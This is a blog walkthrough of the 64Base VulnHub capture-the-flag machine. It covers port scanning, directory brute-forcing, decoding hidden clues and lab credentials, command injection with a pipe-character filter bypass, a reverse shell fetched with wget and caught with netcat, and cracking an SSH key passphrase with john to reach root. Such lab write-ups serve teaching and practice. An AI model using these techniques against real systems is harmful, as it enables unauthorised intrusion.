26 May 2022

Pentesting Fun Stuff

following the cyber security path…

64Base: 1.0.1

Location

https://download.vulnhub.com/64base/64Base_3mrgnc3.ova

Introduction

Author: @3mrgnc3
This is the first public Boot2Root of this author. It’s intended to be more of a fun game than a serious hacking challenge. It is based on the StarWars storyline and is designed to troll you in a fun way. Before starting there is a friendly warning about being littered with more than a few “Red Herrings”.
The difficulty rating is beginner – intermediate.
The main goal is to capture 6 flags, each in the format of flag1{ZXhhbXBsZSBmbGFnCg==}.

Getting started

Starting with a nmap scan.

┌─[n13mant@planetmars]─[~]
└──╼ $nmap -A -T4 -sV -p- 192.168.171.3
Starting Nmap 7.40 ( https://nmap.org ) at 2017-01-03 08:08 CET
Nmap scan report for 192.168.171.3
Host is up (0.00045s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  tcpwrapped
80/tcp    open  http       Apache httpd 2.4.10 ((Debian))
| http-robots.txt: 429 disallowed entries (15 shown)
| /administrator/ /admin/ /login/ /88888/ /88888888/
| /88888888888/ /88888888888P/ /c3P08P/ /C3p0/ /A280/ /above/ /AC1/
|_/across/ /activation/ /Adjustments/
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: 64base
4899/tcp  open  tcpwrapped
62964/tcp open  ssh        OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
|   1024 59:a5:02:ba:72:8a:2e:c1:9c:ff:cc:b2:f8:15:66:b3 (DSA)
|   2048 2a:57:2c:75:8c:34:9f:28:84:15:07:2a:be:d0:41:98 (RSA)
|_  256 97:94:13:38:92:70:6c:3a:c0:4f:f3:f3:e7:ce:40:91 (ECDSA)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.65 seconds

Looks like the website has a ‘robots.txt’, the SSH server is behind an alternate port and 2 ports are tcpwrapped. Let’s start with some banner grabbing.

┌─[n13mant@planetmars]─[~]
└──╼ $curl -I 192.168.171.3:22
The programs included with the Fedora GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Fedora GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Oct 24 02:04:10 4025 from 010.101.010.001
#

A login from the future. 010.101.010.001……..binary perhaps? It should then read  2521. Another port? After a while I think there is nothing here and I get my first taste of some trolling.

┌─[n13mant@planetmars]─[~]
└──╼ $curl -I 192.168.171.3:80
HTTP/1.1 200 OK
Date: Tue, 03 Jan 2017 09:04:50 GMT
Server: Apache/2.4.10 (Debian)
Last-Modified: Tue, 06 Dec 2016 05:33:14 GMT
ETag: "1fdf-542f6bd9b68a0"
Accept-Ranges: bytes
Content-Length: 8159
Vary: Accept-Encoding
Content-Type: text/html

Port 80 seems ok. Nothing special here.

┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $curl -I 192.168.171.3:4899
sshhh! ssh! droids!
So..
You found a way in then...
but, can you pop root?
                                           /~\
                                          |oo )    Did you hear that?
                                          _\=/_
                          ___            /  _  \
                         / ()\          //|/.\|\\
                       _|_____|_        \\ \_/  ||
                      | | === | |        \|\ /| ||
                      |_|  O  |_|        # _ _/ #
                       ||  O  ||          | | |
                       ||__*__||          | | |
                      |~ \___/ ~|         []|[]
                      /=\ /=\ /=\         | | |
      ________________[_]_[_]_[_]________/_]_[_\_________________________

Nice banner.

┌─[n13mant@planetmars]─[~]
└──╼ $curl -I 192.168.171.3:62964
SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3
Protocol mismatch.
curl: (56) Recv failure: Connection reset by peer
┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $ssh 192.168.171.3 -p 62964
The authenticity of host '[192.168.171.3]:62964 ([192.168.171.3]:62964)' can't be established.
ECDSA key fingerprint is SHA256:PhC0Efn/NWWhDzqb57DDh6SKn5feUean+PfxWhASzx4.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.171.3]:62964' (ECDSA) to the list of known hosts.
n13mant@192.168.171.3's password:

And no banner with the SSH server.
On to the webserver.
When I browse to the website I spot a string that looks like base64.

┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $echo 'dmlldyBzb3VyY2UgO0QK' | base64 -d
view source ;D

Looks like I find the first ‘beginners hint’ LOL. In the source code I find a string that looks like hex. Time for another round of decoding.

┌─[n13mant@planetmars]─[~]
└──╼ $echo '5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a' | xxd -r -p | base64 -d
flag1{NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==}
┌─[n13mant@planetmars]─[~]
└──╼ $echo 'NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==' | base64 -d
64base:Th353@r3N0TdaDr01DzU@reL00K1ing4

Got my first flag which also could be a set of crendetials for further down the road.
When I look at the rest of the pages I noticed that there were some random placed words with indentation. When I collect these words and put them after each other, they form:
everybody with must die
With what? There wasn’t another word with the same indentation. So for now I move on.
On the  /post.html page there is a cool ASCII art poster with an interesting bottom.

A ‘real Imperial-Class BountyHunter’? Maybe a hint for changing my user-agent?
The rest of the pages didn’t look like they had something of value.
Next is the ‘robots.txt’. It’s a big list and from the looks of it, most pages are empty. To make things a bit more easy I copy the list from ‘robots.txt’ and paste them in a file. With the ‘cut’ command I remove the first 11 chars and run the file through wfuzz to eliminate the useless pages. As a result I get 2 pages that seem to be worth investigating.

┌─[n13mant@planetmars]─[~]
└──╼ $wfuzz -c -z file,/home/n13mant/Desktop/sw.lst --hc 404 --hw 0 http://192.168.171.3/FUZZ
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                      *
********************************************************
Target: http://192.168.171.3/FUZZ
Total requests: 429
==================================================================
ID	Response   Lines      Word         Chars          Request
==================================================================
00000:  C=401     14 L	      54 W	    460 Ch	  "/admin/"
..."
00377:  C=301      9 L	      28 W	    311 Ch	  "/ZZ"
..."
Total time: 0.489533
Processed Requests: 429
Filtered Requests: 427
Requests/sec.: 876.3438

But after checking the complete result of the wfuzz scan I noticed that there where a lot of 404 (that’s why I filtered them in the first place). But why would there be 404 errors in a ‘robots.txt’ list? I re-run wfuzz, but this time focusing on the 404 errors.

┌─[n13mant@planetmars]─[~]
└──╼ $wfuzz -c -z file,/home/n13mant/Desktop/sw.lst --sc 404 http://192.168.171.3/FUZZ
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                      *
********************************************************
Target: http://192.168.171.3/FUZZ
Total requests: 429
==================================================================
ID	Response   Lines      Word         Chars          Request
==================================================================
00001:  C=404      9 L	      32 W	    291 Ch	  "/administrator..."
00003:  C=404      9 L	      32 W	    283 Ch	  "/login/"
..."
00147:  C=404      9 L	      32 W	    283 Ch	  "/-HH--/"
..."
00166:  C=404      9 L	      32 W	    280 Ch	  "/-l/"
..."
00202:  C=404      9 L	      32 W	    280 Ch	  "/-o/"
..."
00203:  C=404      9 L	      32 W	    283 Ch	  "/-nn--/"
..."
00205:  C=404      9 L	      32 W	    294 Ch	  "/o88888/888888..."
..."8:  C=404      9 L	      32 W	    288 Ch	  "/Office/r/s/"
00209:  C=404      9 L	      32 W	    286 Ch	  "/Office/r/"
..."
00215:  C=404      9 L	      32 W	    285 Ch	  "/oo/----/"
..."
00216:  C=404      9 L	      32 W	    293 Ch	  "/o/-----------..."
00272:  C=404      9 L	      32 W	    282 Ch	  "/-Row/"
..."
00324:  C=404      9 L	      32 W	    295 Ch	  "/thousand/thou..."
00370:  C=404      9 L	      32 W	    295 Ch	  "/XXXXX/XXXXX/X..."
00382:  C=404      9 L	      32 W	    286 Ch	  "/office/s/"
..."
00392:  C=404      9 L	      32 W	    292 Ch	  "/Imperial-clas..."
Total time: 0.511337
Processed Requests: 429
Filtered Requests: 413
Requests/sec.: 838.9754

(Another way of doing this was to spider the site with burpsuite. Should give a similar result.)
Because I’m getting nowhere with the 404 results, I start with the found admin site. Maybe the clues and credentials I collected earlier will pay off.

I used the credentials from flag1, but that didn’t work. So I tried it again, but this time with the clue about being an imperial-class bountyhunter. After I changed my user-agent and try to log in again it still wouldn’t let me in. Guess I was missing something.
Being stuck at the moment I went over my notes and after a while (a long while), I noticed that the use of the word Imperial-Class in the clue and in the ‘robots.txt’ list where slightly different. It was a difference in just 1 letter – lower case / upper case.
With the use of cURL I checked the folder ‘/Imperial-Class/’ and this time I got more information.

┌─[n13mant@planetmars]─[~]
└──╼ $curl -vv 192.168.171.3/Imperial-Class/
*   Trying 192.168.171.3...
* Connected to 192.168.171.3 (192.168.171.3) port 80 (#0)
> GET /Imperial-Class/ HTTP/1.1
> Host: 192.168.171.3
> User-Agent: curl/7.50.1
> Accept: */*
>
< HTTP/1.1 401 Unauthorized
< Date: Tue, 03 Jan 2017 09:56:26 GMT
< Server: Apache/2.4.10 (Debian)
< WWW-Authenticate: Basic realm="Authorization Required"
< Content-Length: 460
< Content-Type: text/html; charset=iso-8859-1
<
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>401 Unauthorized</title>
</head><body>
<h1>Unauthorized</h1>
<p>This server could not verify that you
are authorized to access the document
requested.  Either you supplied the wrong
credentials (e.g., bad password), or your
browser doesn't understand how to supply
the credentials required.</p>
<hr>
<address>Apache/2.4.10 (Debian) Server at 192.168.171.3 Port 80</address>
</body></html>
* Connection #0 to host 192.168.171.3 left intact

Another login site. The found credentials worked just fine.

Checking the source code it seems I was still missing something.

<!-- don't forget the BountyHunter login -->

To help me with my search I used cewl to create a wordlist from all the words on the mainsite and ran it through dirb.

┌─[n13mant@planetmars]─[~]
└──╼ $dirb http://192.168.171.3/Imperial-Class/ /home/n13mant/Desktop/sw-list.txt -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Jan  3 12:21:55 2017
URL_BASE: http://192.168.171.3/Imperial-Class/
WORDLIST_FILES: /home/n13mant/Desktop/sw-list.txt
AUTHORIZATION: 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4
-----------------
GENERATED WORDS: 672
---- Scanning URL: http://192.168.171.3/Imperial-Class/ ----
==> DIRECTORY: http://192.168.171.3/Imperial-Class/BountyHunter/
---- Entering directory: http://192.168.171.3/Imperial-Class/BountyHunter/ ----
-----------------
END_TIME: Tue Jan  3 12:21:57 2017
DOWNLOADED: 1344 - FOUND: 0

As the comment said……wow.

When I check the source code of ‘/login.php/’ I get some additional information.

<body bgcolor=#000000><font color=#cfbf00>
<form name="login-form" id="login-form" method="post" action="./login.php">
  <fieldset>
  <legend>Please login:</legend>
  <dl>
    <dt>
      <label title="Username">Username:
      <input tabindex="1" accesskey="u" name="function" type="text" maxlength="50" id="5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756" />
      </label>
    </dt>
  </dl>
  <dl>
    <dt>
      <label title="Password">Password:
      <input tabindex="2" accesskey="p" name="command" type="password" maxlength="15" id="584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c32" />
            </label>
    </dt>
  </dl>
  <dl>
    <dt>
      <label title="Submit">
      <input tabindex="3" accesskey="l" type="submit" name="cmdlogin" value="Login" />
      <!-- basictoken=52714d544a54626d51315a45566157464655614446525557383966516f3d0a -->
      </label>
    </dt>
  </dl>
  </fieldset>
</form>

3 hex strings.

┌─[n13mant@planetmars]─[~]
└──╼ $echo '5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756' | xxd -r -p
ZmxhZzJ7YUhSMGNITTZMeTkzZDNjdWV
┌─[n13mant@planetmars]─[~]
└──╼ $echo '5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756' | xxd -r -p | base64 -d
flag2{aHR0cHM6Ly93d3cuebase64: invalid input

Looks like I have 1 part of the entire string. After I copied them together I got the second flag.

┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $echo '5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c3252714d544a54626d51315a45566157464655614446525557383966516f3d0a ' | xxd -r -p | base64 -d
flag2{aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=}
┌─[n13mant@planetmars]─[~]
└──╼ $echo 'aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=' | base64 -d

Time for some videos on YouTube.

Darth Vader belching……..didn’t see that one coming. Nice way of saying I need to use burpsuite.
When I login with the same credentials as before I get the third flag.


The decoded content of the third flag looked like something I’ve already seen in a previous hint
(IMPORTANT!!! USE SYSTEM INSTEAD OF EXEC TO RUN THE SECRET 5H377).

And there is the fourth flag thanks to remote code execution.
flag4{64base:64base5h377}
Looks like more credentials.
There are a few commands I can execute like ps, netstat, ls.  This way I can get some information about the system.

Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:62964           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:4899            0.0.0.0:*               LISTEN      -
tcp6       0      0 :::62964                :::*                    LISTEN      -
tcp6       0      0 ::1:25                  :::*                    LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN

When I try to use netcat I get another troll.

░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▄▄███░░░░░
░░▄▄░░░░░░░░░░░░░░░░░░░░░░░░░███████░░░░
░░███▄░░░░░░░░░░░░░░░░░░░░░▄█████▀░█░░░░
░░▀█████▄▄▄▄▀▀▀▀▀▀▀▀░▄▄▄▄▄███▀▀░▀███░░░░
░░░░███▀▀░░░░░░░░░░░░░░▀▀▀███░░░░██▀░░░░
░░░░██░░░░░░▄░░░░░░░░░░░░░░░▀▀▄▄███░░░░░
░░░░▄█▄▄████▀█░█▄██▄▄░░░░░░░░░████▀░░░░░
░░░▄████████░░░██████▄▄▄▄░░░░░████░░░░░░
░░░███░█░▀██░░░▀███░█░░███▄▄░░░░▀█░░░░░░
░░░████▄███▄▄░░░███▄▄▄█████▀░░░░░██░░░░░
░░▄████▀▀░▀██▀░░░▀█████████░░░░░░██░░░░░
░░▀███░░░▄▄▀▀▀▄▄░░░░▀██████░░░░░░░█░░░░░
░░░███░░█░░░░░░░▀░░░░▀███▀░░░░░░░░█░░░░░
░░░████▄▀░░░░░░░░▀░░░████▄░░░░░░░░░█░░░░
░░░██████▄░░░░░░░░░▀▀████▀░░░░░░░░░█░░░░
░░▄█████████▀▀▀▀░░░░░░░░░░░░░░░░░░░▀█░░░
░░███████████▄▄▄▄░░░░░░░░░░░░░░░░░░░█▄░░
░░████████▀▀▀▀▀▀░░░░░░░░░░░░░░░░░░░░░█▄░
░░████████▄▄░░░░░░░░░░░░░░░░░░░░░░░░░░█░
░▄███████▄▄░░░░░░░░░░░░░░░░░░░░░░░░░░░░█
░▀▀▀▀▀▀▀▀▀█▀▀▀░░░░░░░░░░░░░░░░░░░░░░░░░█
Is this the net cat you are looking for?

Later on I found out there was another command I could use, namely wget.
With this command I tried to upload a test file onto the machine. But that didn’t worked out so well. After a while it was clear that there was a filter in place. But what kind I didn’t know….yet.
Because the ‘f’ parameter could run several functions (e.g. exec, system) I tried the function ‘var_dump’. This function is used to display structured information about variables. With it I can hopefully find out what chars are being filtered.


Bummer. Looks like all the used chars got filtered. I need to find a bypass. The only char that isn’t getting filtered is the ‘|’ (pipe) char. And because it looks like I’m stuck inside this ’64base’ binary file, I need to break out and execute the ‘wget’ command to upload a file to the remote system.

When trying the ‘uname’ command it wouldn’t work because I was trapped in the 64base file. But because of the pipe char not being filtered I could tried to use this char to get myself out and with success.

Now to upload a reverse shell script onto the machine. For this I used the reverse shell script from pentestmonkey. After uploading it to the system and running it I got a shell.

┌─[n13mant@planetmars]─[~]
└──╼ $nc -lvnp 31337
listening on [any] 31337 ...
connect to [192.168.171.2] from (UNKNOWN) [192.168.171.4] 53825
Linux 64base 3.16.0-4-586 #1 Debian 3.16.36-1+deb8u2 (2016-10-19) i686 GNU/Linux
 06:20:22 up 23:29,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
www-data@64base:/64base$ strings well_done_:D
strings well_done_:D
sshhh! ssh! droids!
So..
You found a way in then...
but, can you pop root?
                                           /~\
                                          |oo )    Did you hear that?
                                          _\=/_
                          ___            /  _  \
                         / ()\          //|/.\|\\
                       _|_____|_        \\ \_/  ||
                      | | === | |        \|\ /| ||
                      |_|  O  |_|        # _ _/ #
                       ||  O  ||          | | |
                       ||__*__||          | | |
                      |~ \___/ ~|         []|[]
                      /=\ /=\ /=\         | | |
      ________________[_]_[_]_[_]________/_]_[_\_________________________

Found the troll from earlier.
And when using the more function I get trolled again 🙂

www-data@64base:~/html$ ls -aRl | more
ls -aRl | more
███╗   ███╗ ██████╗ ██████╗ ███████╗██████╗
████╗ ████║██╔═══██╗██╔══██╗██╔════╝╚════██╗
██╔████╔██║██║   ██║██████╔╝█████╗    ▄███╔╝
██║╚██╔╝██║██║   ██║██╔══██╗██╔══╝    ▀▀══╝
██║ ╚═╝ ██║╚██████╔╝██║  ██║███████╗  ██╗
╚═╝     ╚═╝ ╚═════╝ ╚═╝  ╚═╝╚══════╝  ╚═╝
███╗   ███╗ ██████╗ ██████╗ ██████╗ ███████╗██╗██╗
████╗ ████║██╔═══██╗██╔══██╗██╔══██╗██╔════╝██║██║
██╔████╔██║██║   ██║██████╔╝██████╔╝█████╗  ██║██║
██║╚██╔╝██║██║   ██║██╔══██╗██╔══██╗██╔══╝  ╚═╝╚═╝
██║ ╚═╝ ██║╚██████╔╝██║  ██║██║  ██║███████╗██╗██╗
╚═╝     ╚═╝ ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═╝╚═╝
██╗   ██╗ ██████╗ ██╗   ██╗    ██╗    ██╗ █████╗ ███╗   ██╗████████╗
╚██╗ ██╔╝██╔═══██╗██║   ██║    ██║    ██║██╔══██╗████╗  ██║╚══██╔══╝
 ╚████╔╝ ██║   ██║██║   ██║    ██║ █╗ ██║███████║██╔██╗ ██║   ██║
  ╚██╔╝  ██║   ██║██║   ██║    ██║███╗██║██╔══██║██║╚██╗██║   ██║
   ██║   ╚██████╔╝╚██████╔╝    ╚███╔███╔╝██║  ██║██║ ╚████║   ██║
   ╚═╝    ╚═════╝  ╚═════╝      ╚══╝╚══╝ ╚═╝  ╚═╝╚═╝  ╚═══╝   ╚═╝
███╗   ███╗ ██████╗ ██████╗ ███████╗██╗██╗██████╗
████╗ ████║██╔═══██╗██╔══██╗██╔════╝██║██║╚════██╗
██╔████╔██║██║   ██║██████╔╝█████╗  ██║██║  ▄███╔╝
██║╚██╔╝██║██║   ██║██╔══██╗██╔══╝  ╚═╝╚═╝  ▀▀══╝
██║ ╚═╝ ██║╚██████╔╝██║  ██║███████╗██╗██╗  ██╗
╚═╝     ╚═╝ ╚═════╝ ╚═╝  ╚═╝╚══════╝╚═╝╚═╝  ╚═╝
ls: write error: Broken pipe

After some more searching I found flag number 5.

www-data@64base:~/html$ cd .admin
cd .admin
bash: cd: .admin: No such file or directory
www-data@64base:~/html$ cd ./admin
cd ./admin
www-data@64base:~/html/admin$ ls -lah
ls -lah
total 28K
drwxr-xr-x   3 www-data www-data 4.0K Dec  6 03:00 .
drwxr-xr-x 431 www-data www-data  12K Dec  6 02:41 ..
-rw-r--r--   1 www-data www-data  113 Dec  6 02:25 .htaccess
drwxr-xr-x   2 root     root     4.0K Dec  6 03:00 S3cR37
-rwxr-xr-x   1 www-data www-data  139 Nov 30 07:02 index.php
www-data@64base:~/html/admin$ cd S3cR37
cd S3cR37
www-data@64base:~/html/admin/S3cR37$ ls -lah
ls -lah
total 200K
drwxr-xr-x 2 root     root     4.0K Dec  6 03:00 .
drwxr-xr-x 3 www-data www-data 4.0K Dec  6 03:00 ..
-------r-- 1 root     root     192K Nov 30 11:31 flag5{TG9vayBJbnNpZGUhIDpECg==}
www-data@64base:~/html/admin/S3cR37$ echo TG9vayBJbnNpZGUhIDpECg== | base64 -d
<n/S3cR37$ echo TG9vayBJbnNpZGUhIDpECg== | base64 -d
Look Inside! :D
www-data@64base:~/html/admin/S3cR37$ file flag5{TG9vayBJbnNpZGUhIDpECg==}
file flag5{TG9vayBJbnNpZGUhIDpECg==}
flag5{TG9vayBJbnNpZGUhIDpECg==}: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, comment: "4c5330744c5331435255644a546942535530456755464a4a566b4655525342", baseline, precision 8, 960x720, frames 3

A picture. I could try and download it to my machine, but instead I use strings and found a big string at the top that looks like hex. After some decoding I get base64 and when I’ve decoded that I get a RSA private key.

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,621A38AAD4E9FAA3657CA3888D9B356C
mDtRxIwh40RSNAs2+lNRHvS9yhM+eaxxU5yrGPCkrbQW/RgPP+RGJBz9VrTkvYw6
YcOuYeZMjs4fIPn7FZyJgxGHhSxQoxVn9kDkwnsMNDirtcoCOk9RDAG5ex9x4TMz
8IlDBQq5i9Yzj9vPfzeBDZdIz9Dw2gn2SaEgu5zel+6HGObF8Zh3MIchy8s1XrE0
kvLKI252mzWw4kbSs9+QaWyh34k8JIVzuc1QCybz5WoU5Y56G6q1Rds0bcVqLUse
MSzKk3mKaWAyLXlo7LnmqqUFKHndBE1ShPVVi4b0GyFILOOvtmvFb4+zhu6jOWYH
k2hdCHNSt+iggy9hh3jaEgUnSPZuE7NJwDYa7eSDagL17XKpkm2YiBVrUXxVMnob
wXRf5BcGKU97xdorV2Tq+h9KSlZe799trTrFGNe05vxDrij5Ut2KcQx+98K8KpWL
guJPRPKGijo96HDGc3L5YsxObVg+/fj0AvsKfrcV/lxaW+Imymc1MXiJMbmCzlDw
TAWmaqkRFDyA1HUvtvSeVqS1/HjhDw9d4KsvsjkjvyeQTssfsdGcU0hDkXwRWssd
2d3G+Njm1R5ZLNgRlNpVGjhKC4AsfXS3J0z2t3BPM9ZOBMBe9Dx8zm5xFY9zWtrv
AGpr0Bh8KQwmpjQUc1afsqaQX0UHNLXT1ZOWKjg4SA3XC9dCEyFq0SIxQjO9LGCG
4Q5ncfUhmvtqyutCll2dXPsXVDe4eoD1CkvJNDY3KPW+GkN9L+9CPy8+DNunFIwx
+T++7Qg/uPXKq4M61IQ8034UhuRWS4TqP9azX3CG9LyoiB6VbKOeDwN8ailLKZBs
fY9Q6AM1sylizH1nnxKOtZQWurxjGJBIs62telMkas9yNMk3Lu7qRH6swO9sdTBi
+j0x4uDZjJcgMXxfb0w5A64lYFsMRzFj7Xdfy19+Me8JEhQ8KNXDwQKDyULFOTsz
13VfBNxYsyL5zGXNzyqZ4I/OO7Med2j0Gz0g21iHA/06mrs2clds6SUBGEvn8NiV
rSrH6vEs4Szg0x8ddGvQ0qW1vMkTRu3Oy/e10F745xDMATKRlKZ6rYHMCxJ3Icnt
Ez0OMXYdC6CiF/IWtgdU+hKyvs4sFtCBclSagmDTJ2kZdu4RRwYVV6oINz9bpOvE
Rx3HUqfnKShruzM9ZkiIkuSfRtfiMvbTzffJTS4c48CO5X/ReF/AaMxkbSdEOFsI
Fv9Xdi9SdNuxGHE2G4HvJdIprFUrVSpSI80wgrb245sw6gToitZ90hJ4nJ5ay7AG
Yiaa5o7877/fw6YZ/2U3ADdiSOBm+hjV2JVxroyUXbG5dfl3m8Gvf71J62FHq8vj
qJanSk8175z0bjrXWdLG3DSlIJislPW+yDaf7YBVYwWR+TA1kC6ieIA5tU3pn/I3
64Z5mpC+wqfTxGgeCsgIk9vSn2p/eetdI3fQW8WXERbDet1ULHPqtIi7SZbj8v+P
fnHLQvEwIs+Bf1CpK1AkZeUMREQkBhDi72HFbw2G/zqti/YdnqxAyl6LZzIeQn8t
/Gj4karJ1iM9If39dM5OaCVZR/TOBVaR8mrP7VtJor9jeH2tEL0toEqWB1PK0uXP
-----END RSA PRIVATE KEY-----

The only thing I haven’t tried is the ssh server on port 62964.

┌─[n13mant@planetmars]─[~]
└──╼ $ssh root@192.168.171.4 -p 62964 -i ./Desktop/sshkey
The authenticity of host '[192.168.171.4]:62964 ([192.168.171.4]:62964)' can't be established.
ECDSA key fingerprint is SHA256:PhC0Efn/NWWhDzqb57DDh6SKn5feUean+PfxWhASzx4.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.171.4]:62964' (ECDSA) to the list of known hosts.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for './Desktop/sshkey' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "./Desktop/sshkey": bad permissions
root@192.168.171.4's password:

Wrong permission.

┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $chmod 400 ./Desktop/sshkey
┌─[n13mant@planetmars]─[~]
└──╼ $ssh root@192.168.171.4 -p 62964 -i ./Desktop/sshkey
Enter passphrase for key './Desktop/sshkey':

A passphrase. Time for some cracking.
Because I need a properly formatted password hash I use ‘ssh2john’ to extract the password hash from the private key.

┌─[n13mant@planetmars]─[~/Desktop]
└──╼ $ssh2john sshkey > converted_key

Now to load up the file into John password cracker and use the well known rockyou wordlist to hopefully crack the password.

┌─[✗]─[n13mant@planetmars]─[~/Desktop]
└──╼ $john converted_key --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA 32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
usetheforce      (sshkey)
1g 0:00:00:01 DONE (2017-01-05 15:48) 0.8196g/s 467452p/s 467452c/s 467452C/s usetheforce
Use the "--show" option to display all of the cracked passwords reliably
Session completed

And after a split second I got the password being usetheforce.
For this task i also could have used Phrasen|drescher instead. But John worked out just fine.

┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $ssh root@192.168.171.4 -p 62964 -i ./Desktop/sshkey
Enter passphrase for key './Desktop/sshkey':
Last login: Tue Dec  6 05:40:07 2016 from 172.16.0.18
flag6{NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK}

After some final trolling I get the 6th and final flag.

root@64base:~# echo 'NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK' | base64 -d
4e546b325a4451324e324531595455304e546b7a4d4451354e444d7a4d545a694e446b304d7a4d354d7a49314f5455344e446b334e6a59794e44637a4f545a684e546b314e7a63334e7a5930597a5a6b4e7a677a4d5459784d7a49314e6a4d344e6a49304e7a55324e3245324d7a63354d7a55334f5456684e5463304e6a637a4e444d324e7a4e6b4d32517759516f3d0a
